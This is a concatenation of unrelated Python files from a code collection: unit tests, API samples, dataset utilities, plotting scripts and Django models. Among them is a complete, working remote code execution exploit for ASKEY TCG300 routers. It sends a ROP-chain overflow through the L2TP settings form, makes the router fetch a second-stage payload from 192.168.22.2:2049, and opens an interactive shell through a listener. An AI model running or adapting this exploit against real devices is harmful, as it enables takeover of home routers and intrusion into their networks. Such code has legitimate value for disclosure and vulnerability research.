path_spec = os_path_spec.OSPathSpec(location=test_file)
self._raw_path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
def testOpenCloseInode(self):
"""Test the open and close functionality using an inode."""
self._TestOpenCloseInode(self._raw_path_spec)
def testOpenCloseLocation(self):
"""Test the open and close functionality using a location."""
self._TestOpenCloseLocation(self._raw_path_spec)
def testSeek(self):
"""Test the seek functionality."""
self._TestSeek(self._raw_path_spec)
def testRead(self):
"""Test the read functionality."""
self._TestRead(self._raw_path_spec)
class SplitRawFileTest(test_lib.ImageFileTestCase):
"""The unit test for the split storage media image file-like object."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
super(SplitRawFileTest, self).setUp()
test_file = os.path.join(u'test_data', u'image.raw.000')
path_spec = os_path_spec.OSPathSpec(location=test_file)
self._raw_path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
def testOpenCloseInode(self):
"""Test the open and close functionality using an inode."""
self._TestOpenCloseInode(self._raw_path_spec)
def testOpenCloseLocation(self):
"""Test the open and close functionality using a location."""
self._TestOpenCloseLocation(self._raw_path_spec)
def testSeek(self):
"""Test the seek functionality."""
self._TestSeek(self._raw_path_spec)
def testRead(self):
"""Test the read functionality."""
self._TestRead(self._raw_path_spec)
if __name__ == '__main__':
unittest.main()
| 2.671875 | 3 |
folders-cli/sample.py | mark-b-kauffman/panopto-api-python-examples | 7 | 12761568 |
#!python3
import sys
import argparse
import requests
import urllib3
from panopto_folders import PanoptoFolders
from os.path import dirname, join, abspath
sys.path.insert(0, abspath(join(dirname(__file__), '..', 'common')))
from panopto_oauth2 import PanoptoOAuth2
# Top level folder is represented by zero GUID.
# However, it is not a real folder and some APIs behave differently than with an actual folder.
GUID_TOPLEVEL = '00000000-0000-0000-0000-000000000000'
def parse_argument():
parser = argparse.ArgumentParser(description='Sample of Folders API')
parser.add_argument('--server', dest='server', required=True, help='Server name as FQDN')
parser.add_argument('--client-id', dest='client_id', required=True, help='Client ID of OAuth2 client')
parser.add_argument('--client-secret', dest='client_secret', required=True, help='Client Secret of OAuth2 client')
parser.add_argument('--skip-verify', dest='skip_verify', action='store_true', required=False, help='Skip SSL certificate verification. (Never apply to the production code)')
return parser.parse_args()
def main():
args = parse_argument()
if args.skip_verify:
# This line is needed to suppress annoying warning message.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Use requests module's Session object in this example.
# ref. https://2.python-requests.org/en/master/user/advanced/#session-objects
requests_session = requests.Session()
requests_session.verify = not args.skip_verify
# Load OAuth2 logic
oauth2 = PanoptoOAuth2(args.server, args.client_id, args.client_secret, not args.skip_verify)
# Load Folders API logic
folders = PanoptoFolders(args.server, not args.skip_verify, oauth2)
current_folder_id = GUID_TOPLEVEL
while True:
print('----------------------------')
current_folder = get_and_display_folder(folders, current_folder_id)
sub_folders = get_and_display_sub_folders(folders, current_folder_id)
current_folder_id = process_selection(folders, current_folder, sub_folders)
def get_and_display_folder(folders, folder_id):
'''
Returns the folder object that is returned by the API,
or None if it is the top level folder.
'''
print()
print('Folder:')
if folder_id == GUID_TOPLEVEL:
print(' Top level folder (no detail information is available)')
return None
folder = folders.get_folder(folder_id)
print(' Name: {0}'. format(folder['Name']))
print(' Id: {0}'. format(folder['Id']))
if folder['ParentFolder'] is None:
print(' Parent Folder: Top level folder')
else:
print(' Parent Folder: {0}'. format(folder['ParentFolder']['Name']))
print(' Folder URL: {0}'. format(folder['Urls']['FolderUrl']))
print(' Embed URL: {0}'. format(folder['Urls']['EmbedUrl']))
print(' Share settings URL: {0}'. format(folder['Urls']['ShareSettingsUrl']))
return folder
def get_and_display_sub_folders(folders, current_folder_id):
print()
print('Sub Folders:')
children = folders.get_children(current_folder_id)
# returning object is the dictionary, key (integer) and folder's ID (UUID)
result = {}
key = 0
for entry in children:
result[key] = entry['Id']
print(' [{0}]: {1}'.format(key, entry['Name']))
key += 1
return result
def process_selection(folders, current_folder, sub_folders):
if current_folder is None:
new_folder_id = GUID_TOPLEVEL
parent_folder_id = GUID_TOPLEVEL
else:
new_folder_id = current_folder['Id']
if current_folder['ParentFolder'] is None:
parent_folder_id = GUID_TOPLEVEL
else:
parent_folder_id = current_folder['ParentFolder']['Id']
print()
print('[P] Go to parent')
print('[R] Rename this folder')
print('[D] Delete this folder')
print('[S] Search folders')
print('[L] List sessions in the folder')
print()
selection = input('Enter the command (select number to move folder): ')
try:
key = int(selection)
if sub_folders[key]:
return sub_folders[key]
except:
pass # selection is not a number, fall through
if selection.lower() == 'p':
new_folder_id = parent_folder_id
elif selection.lower() == 'r' and current_folder is not None:
rename_folder(folders, current_folder)
elif selection.lower() == 'd' and current_folder is not None:
if delete_folder(folders, current_folder):
new_folder_id = parent_folder_id
elif selection.lower() == 's':
result = search_folder(folders)
if result is not None:
new_folder_id = result
elif selection.lower() == 'l' and current_folder is not None:
list_sessions(folders, current_folder)
else:
print('Invalid command.')
return new_folder_id
def rename_folder(folders, folder):
new_name = input('Enter new name: ')
return folders.update_folder_name(folder['Id'], new_name)
def delete_folder(folders, folder):
return folders.delete_folder(folder['Id'])
def search_folder(folders):
query = input('Enter search keyword: ')
entries = folders.search_folders(query)
if len(entries) == 0:
print(' No hit.')
return None
for index in range(len(entries)):
print(' [{0}]: {1}'.format(index, entries[index]['Name']))
selection = input('Enter the number (or just enter to stay current): ')
new_folder_id = None
try:
index = int(selection)
if 0 <= index < len(entries):
new_folder_id = entries[index]['Id']
except:
pass
return new_folder_id
def list_sessions(folders, folder):
print('Sessions in the folder:')
for entry in folders.get_sessions(folder['Id']):
print(' {0}: {1}'.format(entry['Id'], entry['Name']))
if __name__ == '__main__':
main()
| 2.578125 | 3 |
code/create-tinsley.py | diaaalfar/web-app-python | 7 | 12761569 |
import jinja2
loader = jinja2.FileSystemLoader(['.'])
environment = jinja2.Environment(loader=loader)
template = environment.get_template('biography.html')
who = '<NAME>'
what = ['Born 1941', 'Died 1981', 'Studied stellar aging']
result = template.render(name=who, facts=what)
print(result)
| 2.796875 | 3 |
#100DaysOfCode/96_Day/pdfExercise03.py | jpromanonet/codeChallenges | 0 | 12761570 | # Third exercise using PDF libraries in Python
# Importing libraries and frameworks
import PyPDF2
# Defining Global Variables
pdf1File = open('meetingminutes.pdf', 'rb')
pdf2File = open('meetingminutes2.pdf', 'rb')
pdf1Reader = PyPDF2.PdfFileReader(pdf1File)
pdf2Reader = PyPDF2.PdfFileReader(pdf2File)
# Program logic
pdfWriter = PyPDF2.PdfFileWriter()
for pageNum in range(pdf1Reader.numPages):
pageObject = pdf1Reader.getPage(pageNum)
pdfWriter.addPage(pageObject)
for pageNum in range(pdf2Reader.numPages):
pageObject = pdf2Reader.getPage(pageNum)
pdfWriter.addPage(pageObject)
pdfOutputFile = open('combinedminutes.pdf', 'wb')
pdfWriter.write(pdfOutputFile)
pdfOutputFile.close()
pdf1File.close()
pdf2File.close() | 3.578125 | 4 |
pinn/io/base.py | FZJ-IAS5-MLMD/PiNN | 0 | 12761571 |
# -*- coding: utf-8 -*-
"""Basic functions for dataset loaders"""
import random
import tensorflow as tf
class _datalist(list):
"""The same thing as list, but don't count in nested structure
"""
pass
def sparse_batch(batch_size, drop_remainder=False, num_parallel_calls=8,
atomic_props=['f_data', 'q_data', 'f_weights']):
"""This returns a dataset operation that transforms single samples
into sparse batched samples. The atomic_props must include all
properties that are defined on an atomic basis besides 'coord' and
'elems'.
Args:
drop_remainder (bool): option for padded_batch
num_parallel_calls (int): option for map
atomic_props (list): list of atomic properties
"""
def sparsify(tensors):
atom_ind = tf.cast(tf.where(tensors['elems']), tf.int32)
ind_1 = atom_ind[:, :1]
ind_sp = tf.cumsum(tf.ones(tf.shape(ind_1), tf.int32))-1
tensors['ind_1'] = ind_1
elems = tf.gather_nd(tensors['elems'], atom_ind)
coord = tf.gather_nd(tensors['coord'], atom_ind)
tensors['elems'] = elems
tensors['coord'] = coord
# Optional
for name in atomic_props:
if name in tensors:
tensors[name] = tf.gather_nd(tensors[name], atom_ind)
return tensors
return lambda dataset: \
dataset.padded_batch(batch_size, dataset.output_shapes,
drop_remainder=drop_remainder).map(
sparsify, num_parallel_calls)
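# Example usage (sketch): turn a per-structure dataset into sparse batches of 32
# batched = sparse_batch(32)(dataset)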
def map_nested(fn, nested):
"""Map fn to the nested structure
"""
if isinstance(nested, dict):
return {k: map_nested(fn, v) for k, v in nested.items()}
if isinstance(nested, list) and type(nested) != _datalist:
return [map_nested(fn, v) for v in nested]
else:
return fn(nested)
def flatten_nested(nested):
"""Retun a list of the nested elements
"""
if isinstance(nested, dict):
return sum([flatten_nested(v) for v in nested.values()], [])
if isinstance(nested, list) and type(nested) != _datalist:
return sum([flatten_nested(v) for v in nested], [])
else:
return [nested]
def split_list(data_list, split={'train': 8, 'vali': 1, 'test': 1},
shuffle=True, seed=None):
"""
Split the list according to a given ratio
Args:
data_list (list): a list to split
split: a nested structure (lists and dicts) of split ratios
Returns:
A nest structure of splitted data list
"""
import math
dummy = _datalist(data_list)
if shuffle:
random.seed(seed)
random.shuffle(dummy)
data_tot = len(dummy)
split_tot = float(sum(flatten_nested(split)))
def get_split_num(x): return math.ceil(data_tot*x/split_tot)
split_num = map_nested(get_split_num, split)
def _pop_data(n):
to_pop = dummy[:n]
del dummy[:n]
return _datalist(to_pop)
splitted = map_nested(_pop_data, split_num)
return splitted
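# Example (sketch): the default 8:1:1 split of 100 samples
# subsets = split_list(list(range(100)))
# [len(subsets[k]) for k in ('train', 'vali', 'test')]  # -> [80, 10, 10]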
def list_loader(pbc=False, force=False, format_dict=None):
"""Decorator for building dataset loaders"""
from functools import wraps
if format_dict is None:
format_dict = {
'elems': {'dtype': tf.int32, 'shape': [None]},
'coord': {'dtype': tf.float32, 'shape': [None, 3]},
'e_data': {'dtype': tf.float32, 'shape': []},
}
if pbc:
format_dict['cell'] = {'dtype': tf.float32, 'shape': [3, 3]}
if force:
format_dict['f_data'] = {'dtype': tf.float32, 'shape': [None, 3]}
def decorator(func):
@wraps(func)
def data_loader(data_list, split={'train': 8, 'vali': 1, 'test': 1},
shuffle=True, seed=0):
def _data_generator(data_list):
for data in data_list:
yield func(data)
dtypes = {k: v['dtype'] for k, v in format_dict.items()}
shapes = {k: v['shape'] for k, v in format_dict.items()}
def generator_fn(data_list): return tf.data.Dataset.from_generator(
lambda: _data_generator(data_list), dtypes, shapes)
subsets = split_list(data_list, split, shuffle, seed)
splitted = map_nested(generator_fn, subsets)
return splitted
return data_loader
return decorator
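# Example usage (sketch; the per-sample dict keys are assumptions):
# @list_loader(force=True)
# def load_sample(sample):
#     return {'elems': sample['elems'], 'coord': sample['coord'],
#             'e_data': sample['energy'], 'f_data': sample['forces']}
# splits = load_sample(list_of_samples)  # -> {'train': ..., 'vali': ..., 'test': ...}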
| 2.59375 | 3 |
TCG300/auth_stack_overflow_l2tp_exploit.py | ecos-wtf/ecosploits | 5 | 12761572 |
#!/usr/bin/env python3
'''
This script demonstrates an authenticated remote code execution flaw
affecting ASKEY TCG300 (aka Siligence TCG300) deployed by Orange Belgium.
Upon exploitation, the device will connect to 192.168.22.2:2049 to pull
a second stage payload (removed here).
Author: <NAME> <<EMAIL>>
'''
import string
import requests
import re
from requests.auth import HTTPBasicAuth
import sys
import struct
from pwn import *
from threading import Thread
def handler():
with open('rop_stage2.bin', 'rb') as f:
shellcode = f.read()
l = listen(2049, '0.0.0.0')
c = l.wait_for_connection()
print("[+] Got connection. Sending payload.")
l.sendline(shellcode)
l.interactive()
def pad(length):
return randoms(length).encode('utf-8')
def build_payload():
context.endian = 'big'
debug_addr = 0x99999999
hardcoded_afinet = 0x81916fd8 # tcp/2049
socket_addr = 0x80e936d0
connect_addr = 0x80e93abc
recv_addr = 0x80e9418c
sleep_addr = 0x80e90608
sockfd_addr = 0x86705fd0
sockaddr_addr = 0x867dade4 # IkeThread stack address
payload_buffer_addr = 0x867dade4 + 0x64
payload = b""
payload += pad(314)
# -------------------------------------
# socket(2, 1, 0)
# -------------------------------------
payload += p32(0x80dea1c8)
# 0x80dea1c8: addiu $a0, $zero, 2; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(8)
payload += p32(0x80f20198)
# 0x80f20198: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(0x80e65808)
# 0x80e65808: move $a2, $zero; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += p32(socket_addr)
payload += p32(socket_addr)
payload += p32(socket_addr)
payload += p32(0x80737ea4)
# 0x80737ea4: lw $v0, 4($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0x10)
payload += p32(socket_addr)
payload += pad(0x8)
payload += p32(0x80d9fd2c)
# 0x80d9fd2c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
# ---------------------------------------
# connect(sockfd, sockaddr_in, socklen)
# ---------------------------------------
payload += pad(0x10)
payload += p32(0x800669e4)
# 0x800669e4: lw $ra, 4($sp); lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0x8)
payload += p32(sockfd_addr - 0x4) # $s0
payload += p32(0x80bf878c) # $ra
# 0x80bf878c: sw $v0, 4($s0); lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(0x80cf6080)
# 0x80cf6080: move $a0, $v0; lw $ra, ($sp); move $v0, $a0; jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0x8)
payload += p32(0x80e4d5c4)
# 0x80e4d5c4: lw $a2, ($sp); lw $ra, 0x18($sp); lw $s1, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0xc)
payload += p32(0x20202020) # $a2
payload += pad(0xc)
payload += p32(hardcoded_afinet) # $s0
payload += p32(sockaddr_addr) # $s1
payload += p32(0x80e06398)
# load value from hardcoded_afinet ($s0) into $v0
# 0x80e06398: lw $v0, ($s0); lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0x8)
payload += p32(0x80865478)
# store value from $v0 (hardcoded_afinet) into address $s1 (sockaddr_addr)
# 0x80865478: sw $v0, ($s1); lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(sockaddr_addr + 0x04) # sockaddr_addr + offset to put IP
payload += p32(0x80e341cc)
# 0x80e341cc: lw $v0, ($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0x4)
payload += struct.pack('>BBBB', 192, 168, 22, 2)
#--works--
payload += pad(0xc)
# 0x80865478: sw $v0, ($s1); lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += p32(0x80865478)
payload += pad(0xc)
payload += p32(sockaddr_addr) #$s1
payload += p32(sockaddr_addr) # $s0
payload += p32(0x8030c73c)
# 0x8030c73c: move $a1, $s0; andi $v0, $v0, 0xff; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;'))
payload += pad(0x8)
payload += p32(0x80737ea4)
# 0x80737ea4: lw $v0, 4($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0xc)
payload += p32(connect_addr)
payload += pad(0x8)
payload += p32(0x80d9fd2c)
# 0x80d9fd2c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
# ----------------------------------------------------
# recv(int sockfd, void *buf, size_t len, int flags);
# ----------------------------------------------------
payload += pad(0x10)
payload += p32(0x8082df90)
# 0x8082df90: lw $a1, 4($sp); lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0xc)
payload += p32(payload_buffer_addr)
#payload += pad(0x8)
payload += pad(0xc)
payload += p32(0x80b6ff18)
# 0x80b6ff18: addiu $a2, $zero, 0x400; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(0x80f10f24)
# 0x80f10f24: move $a3, $zero; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0x8)
payload += p32(0x800741cc)
# 0x800741cc: nop; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(sockfd_addr) # $s0
payload += pad(0x4) # $s1
payload += p32(0x80dd01d4) # $ra
# 0x80dd01d4: lw $a0, ($s0); lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(0x80737ea4) # $ra
# 0x80737ea4: lw $v0, 4($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0x8)
payload += p32(recv_addr)
payload += pad(0x8)
payload += p32(0x80d9fd2c)
# 0x80d9fd2c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
# call recv($a0, $a1, $a2, $a3)
# ----------------------------------------
# sleep(2)
# ----------------------------------------
payload += pad(0x10)
payload += p32(0x80dea1c8)
# 0x80dea1c8: addiu $a0, $zero, 2; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0x8)
payload += p32(0x80737ea4)
# 0x80737ea4: lw $v0, 4($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;'))
payload += pad(0x10)
payload += p32(sleep_addr)
payload += pad(0x8)
payload += p32(0x80d9fd2c)
# 0x80d9fd2c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
# ------------------------------------------
# jump to shellcode
# ------------------------------------------
payload += pad(0x10)
payload += p32(0x80737ea4)
# 0x80737ea4: lw $v0, 4($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0xc)
payload += p32(payload_buffer_addr)
payload += pad(0x8)
payload += p32(0x80d9fd2c)
# 0x80d9fd2c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;'))
payload += pad(0xc)
payload += p32(payload_buffer_addr)
payload += p32(payload_buffer_addr)
# --- At this point, we're executing the received payload from the remote server
return payload
def login(username="admin", password="<PASSWORD>"):
response = requests.post(
"http://192.168.0.1/goform/AskLogin",
data = {
"AskUsername":username,
"AskPassword":password
},
allow_redirects=False
)
return response.headers['Location'] == "/overview.asp"
def exploit():
try:
requests.post(
"http://192.168.0.1/goform/AskVPNL2TP",
data={
"PPPStartIp0":10,
"PPPStartIp1":0,
"PPPStartIp2":0,
"PPPStartIp3":1,
"PPPEndIp0":10,
"PPPEndIp1":0,
"PPPEndIp2":0,
"PPPEndIp3":254,
"AskMPPEValue":1,
"AskVPNIPSecValue":0,
"L2TPuser2":build_payload(),
"L2TPPassword0":"A",
"L2TPPresharedPhrase":"A"
},
allow_redirects=False,
timeout=2
)
except Exception as e:
# handle inevitable timeout
return
if __name__ == "__main__":
if login():
print("[+] Login successful.")
print("[+] Launching reverse shell handler.")
handlerthr = Thread(target=handler)
handlerthr.start()
print("[+] Sending exploit payload.")
exploit()
else:
print("[!] An error occured.")
| 2.25 | 2 |
rnacentral/portal/models/taxonomy.py | RNAcentral/rnacentral-webcode | 21 | 12761573 |
"""
Copyright [2009-2019] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from caching.base import CachingMixin, CachingManager
from django.db import models
class Taxonomy(CachingMixin, models.Model):
id = models.IntegerField(primary_key=True)
name = models.TextField()
lineage = models.TextField()
aliases = models.TextField()
replaced_by = models.ForeignKey('self', db_column='replaced_by', on_delete=models.CASCADE)
common_name = models.TextField()
is_deleted = models.BooleanField()
objects = CachingManager()
class Meta:
db_table = 'rnc_taxonomy'
| 1.75 | 2 |
setup.py | recruit-tech/aris-awsiotcore-to-nav2 | 0 | 12761574 | from setuptools import setup
package_name = 'awsiotcore_to_navigation2'
setup(
name=package_name,
version='0.1.0',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
],
install_requires=['setuptools'],
zip_safe=True,
maintainer='<NAME>',
maintainer_email='<EMAIL>',
description='Receive positional information '
'from AWS IoT Core and send it to Navigation2',
license='MIT',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'iotcore_to_nav2 = '
'awsiotcore_to_navigation2.awsiotcore_to_nav2_node:main'
],
},
)
| 1.640625 | 2 |
ml/sklearn/dendrogram.py | alexnakagawa/tools | 0 | 12761575 | '''
This is an example of a dendrogram plot showing the hierarchical structure of clustering.
Inspired by the "Unsupervised Learning" course on Datacamp.com
Author: <NAME>
'''
# Import normalize, plus the clustering and plotting utilities this snippet relies on
from sklearn.preprocessing import normalize
from scipy.cluster.hierarchy import linkage, dendrogram
import matplotlib.pyplot as plt
# Note: `movements` (the stock price-movement array) and `companies` (the labels)
# are assumed to be preloaded by the course environment.
# Normalize the movements: normalized_movements
normalized_movements = normalize(movements)
# Calculate the linkage: mergings
mergings = linkage(normalized_movements, 'complete')
# Plot the dendrogram
dendrogram(mergings, labels=companies, leaf_rotation=90, leaf_font_size=6)
plt.show()
| 3.328125 | 3 |
TestPrograms/PyQt/PyQt5_QML_CV2/PyCVQML/__init__.py | BA-OST-2022/audio-beamformer-software | 0 | 12761576 | from PyQt5 import QtQml
from .cvcapture import CVCapture, CVAbstractFilter
from .cvitem import CVItem
def registerTypes(uri = "PyCVQML"):
QtQml.qmlRegisterType(CVCapture, uri, 1, 0, "CVCapture")
QtQml.qmlRegisterType(CVItem, uri, 1, 0, "CVItem")
def stopCamera():
CVCapture.stopCamera() | 2.109375 | 2 |
Bar/bar_border_radius.py | pyecharts/pyecharts_gallery | 759 | 12761577 | from pyecharts import options as opts
from pyecharts.charts import Bar
from pyecharts.commons.utils import JsCode
from pyecharts.faker import Faker
c = (
Bar()
.add_xaxis(Faker.choose())
.add_yaxis("商家A", Faker.values(), category_gap="60%")
.set_series_opts(
itemstyle_opts={
"normal": {
"color": JsCode(
"""new echarts.graphic.LinearGradient(0, 0, 0, 1, [{
offset: 0,
color: 'rgba(0, 244, 255, 1)'
}, {
offset: 1,
color: 'rgba(0, 77, 167, 1)'
}], false)"""
),
"barBorderRadius": [30, 30, 30, 30],
"shadowColor": "rgb(0, 160, 221)",
}
}
)
.set_global_opts(title_opts=opts.TitleOpts(title="Bar-渐变圆柱"))
.render("bar_border_radius.html")
)
| 2.265625 | 2 |
gwinpy/net/dhcp_test.py | google/winops | 82 | 12761578 |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for gwinpy.net.dhcp."""
import struct
import unittest
import mock
from gwinpy.net import dhcp
class DhcpTest(unittest.TestCase):
@mock.patch.object(dhcp.socket, 'socket')
@mock.patch.object(dhcp, '_OptScan', autospec=True)
def testGetDhcpOption(self, optscan, socket):
optscan.return_value = None
result = dhcp.GetDhcpOption('192.168.0.1', '11:22:33:44:55:66', 102)
self.assertEqual(None, result)
optscan.return_value = 'America/Chicago'
result = dhcp.GetDhcpOption('192.168.0.2', '11:22:33:44:55:66', 101)
self.assertEqual('America/Chicago', result)
socket.return_value.recv.side_effect = dhcp.socket.timeout
result = dhcp.GetDhcpOption(
'192.168.0.2',
'11:22:33:44:55:66',
101,
server_addr='10.0.0.1',
socket_timeout=5)
socket.return_value.sendto.assert_called_with(mock.ANY, ('10.0.0.1', 67))
socket.return_value.settimeout.assert_called_with(5)
self.assertEqual(None, result)
    # bad mac
    result = dhcp.GetDhcpOption(
        '192.168.0.2', None, 101, server_addr='10.0.0.1', socket_timeout=5)
    self.assertEqual(None, result)
    # bad ip
result = dhcp.GetDhcpOption(
None,
'11:22:33:44:55:66',
101,
server_addr='10.0.0.1',
socket_timeout=5)
self.assertEqual(None, result)
  def testOptScan(self):
    # DHCP options are TLV triples: option code, payload length, payload bytes.
    options = struct.pack('BBBB', 12, 2, 10, 13)        # option 12, 2 bytes
    options += struct.pack('BBB', 40, 1, 1)             # option 40, 1 byte
    options += struct.pack('BBBBB', 120, 3, 8, 28, 15)  # option 120, 3 bytes
    options += struct.pack('B', 255)                    # 255 marks end of options
result = dhcp._OptScan(options, 120)
self.assertEqual(result, b'\x08\x1c\x0f')
result = dhcp._OptScan(options, 121)
self.assertEqual(result, None)
def testZeroFill(self):
result = list(dhcp._ZeroFill(10))
self.assertEqual(len(result), 10)
for i in result:
self.assertEqual(b'\x00', i)
if __name__ == '__main__':
unittest.main()
| 2.015625 | 2 |
src/spaceone/monitoring/model/data_source_response_model.py | xellos00/plugin-aws-cloudwatch | 2 | 12761579 |
from schematics.models import Model
from schematics.types import ListType, DictType, StringType
from schematics.types.compound import ModelType
__all__ = ['PluginInitResponse']
_SUPPORTED_RESOURCE_TYPE = [
'inventory.Server',
'inventory.CloudService'
]
_SUPPORTED_STAT = [
'AVERAGE',
'MAX',
'MIN',
'SUM'
]
_REFERENCE_KEYS = [
{
'resource_type': 'inventory.Server',
'reference_key': 'data.cloudwatch'
}, {
'resource_type': 'inventory.CloudService',
'reference_key': 'data.cloudwatch'
}
]
_REQUIRED_KEYS = ['data.cloudwatch']
class ReferenceKeyModel(Model):
resource_type = StringType(required=True, choices=_SUPPORTED_RESOURCE_TYPE)
reference_key = StringType(required=True)
class PluginMetadata(Model):
supported_resource_type = ListType(StringType, default=_SUPPORTED_RESOURCE_TYPE)
supported_stat = ListType(StringType, default=_SUPPORTED_STAT)
required_keys = ListType(StringType, default=_REQUIRED_KEYS)
class PluginInitResponse(Model):
_metadata = ModelType(PluginMetadata, default=PluginMetadata, serialized_name='metadata')
| 1.921875 | 2 |
文本生成/lstm/train.py | zhangdddong/beautifulNLP | 10 | 12761580 |
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
# @license : Copyright(C), Your Company
# @Author: <NAME>
# @Contact : <EMAIL>
# @Date: 2020-07-18 20:15
# @Description: In User Settings Edit
# @Software : PyCharm
import tensorflow as tf
from read_utils import TextConverter, batch_generator
from model import CharRNN
import os
import codecs
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string('name', 'base', 'name of the model')
tf.flags.DEFINE_integer('num_seqs', 100, 'number of seqs in one batch')
tf.flags.DEFINE_integer('num_steps', 100, 'length of one seq')
tf.flags.DEFINE_integer('lstm_size', 128, 'size of hidden state of lstm')
tf.flags.DEFINE_integer('num_layers', 2, 'number of lstm layers')
tf.flags.DEFINE_boolean('use_embedding', False, 'whether to use embedding')
tf.flags.DEFINE_integer('embedding_size', 128, 'size of embedding')
tf.flags.DEFINE_float('learning_rate', 0.001, 'learning_rate')
tf.flags.DEFINE_float('train_keep_prob', 0.5, 'dropout rate during training')
tf.flags.DEFINE_string('input_file', 'data/poetry.txt', 'utf8 encoded text file')
tf.flags.DEFINE_integer('max_steps', 100000, 'max steps to train')
tf.flags.DEFINE_integer('save_every_n', 1000, 'save the model every n steps')
tf.flags.DEFINE_integer('log_every_n', 10, 'log to the screen every n steps')
tf.flags.DEFINE_integer('max_vocab', 3500, 'max char number')
def main(_):
model_path = os.path.join('checkpoint', FLAGS.name)
    if not os.path.exists(model_path):
os.makedirs(model_path)
with codecs.open(FLAGS.input_file, encoding='utf-8') as f:
text = f.read()
converter = TextConverter(text, FLAGS.max_vocab)
converter.save_to_file(os.path.join(model_path, 'converter.pkl'))
arr = converter.text_to_arr(text)
g = batch_generator(arr, FLAGS.num_seqs, FLAGS.num_steps)
print(converter.vocab_size)
model = CharRNN(
converter.vocab_size,
num_seqs=FLAGS.num_seqs,
num_steps=FLAGS.num_steps,
lstm_size=FLAGS.lstm_size,
num_layers=FLAGS.num_layers,
learning_rate=FLAGS.learning_rate,
train_keep_prob=FLAGS.train_keep_prob,
use_embedding=FLAGS.use_embedding,
embedding_size=FLAGS.embedding_size
)
model.train(
g,
FLAGS.max_steps,
model_path,
FLAGS.save_every_n,
FLAGS.log_every_n,
)
if __name__ == '__main__':
tf.app.run()
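# Hedged usage note (flag values below are illustrative):
#   python train.py --name poetry --input_file data/poetry.txt \
#       --use_embedding=True --max_vocab 3500
# Checkpoints and the pickled TextConverter land in checkpoint/<name>/.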
| 2.265625 | 2 |
commentary/views/moderation.py | mangadventure/django-user-comments | 0 | 12761581 |
from django.contrib.auth.decorators import login_required, permission_required
from django.contrib.sites.shortcuts import get_current_site
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, render
from django.views.decorators.csrf import csrf_protect
from commentary import get_model, models, signals
def next_redirect(request, next=None):
return HttpResponseRedirect(
next or request.POST.get('next') or
request.META.get('HTTP_REFERER', '/')
)
@csrf_protect
@login_required
def flag(request, comment_id, next=None):
"""
Flags a comment. Confirmation on GET, action on POST.
